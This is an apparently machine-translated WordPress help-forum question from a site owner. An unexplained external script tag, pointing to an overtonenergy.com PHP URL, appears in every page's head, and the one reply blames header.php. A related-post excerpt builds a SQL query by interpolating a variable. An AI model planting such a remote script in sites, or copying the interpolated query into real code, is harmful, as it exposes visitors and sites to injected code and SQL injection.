查找代码片段的来源

时间:2015-03-05 作者:Jacob Swain

我最近注意到,我工作的一个网站在每次加载页面时都会给外部网站打电话。以下代码显示在每页上:

<script type="text/javascript" src="http://overtonenergy.com/fr4vvw8w.php?id=358757"></script>
</head>
正如你所看到的,它位于头部的最底部。我不认为这是恶意的,因为它只加载了一个404,没有恶意软件扫描显示出任何危险信号。我在任何源代码中都找不到链接,在数据库的任何地方也找不到链接(通过在phpmyadmin中搜索“overton”)。

我已经禁用了网站上的每个插件,代码仍然存在。

我不知道该怎么做才能找到这些代码的来源。有什么想法或其他策略可以帮我找到问题的根源吗?谢谢

(我也有点不确定这个问题的正确标签,请随意建议其他人)

1 个回复
SO网友:markratledge

这个</head> 标签是赠品;它应该在标题中。php。

结束
标签: security   小码农  

相关推荐

WordPress Ajax Data Security

我知道nonce可以检查意图,但如果我可以用它们来限制数据库读取,那就没有任何意义了?我的意思是,我正在使用AJAX从数据库中获取记录,但我不希望任何人通过其他方式获得该数据(向该数据库发布请求admin-ajax.php 第页)。例如,在我的AJAX处理程序中,我有这么多的工作(我正在发送$myid 以及AJAX调用中的操作):$myid = 5575; $query = \"SELECT `id` FROM table WHERE `user_id` = $myid;\"; $data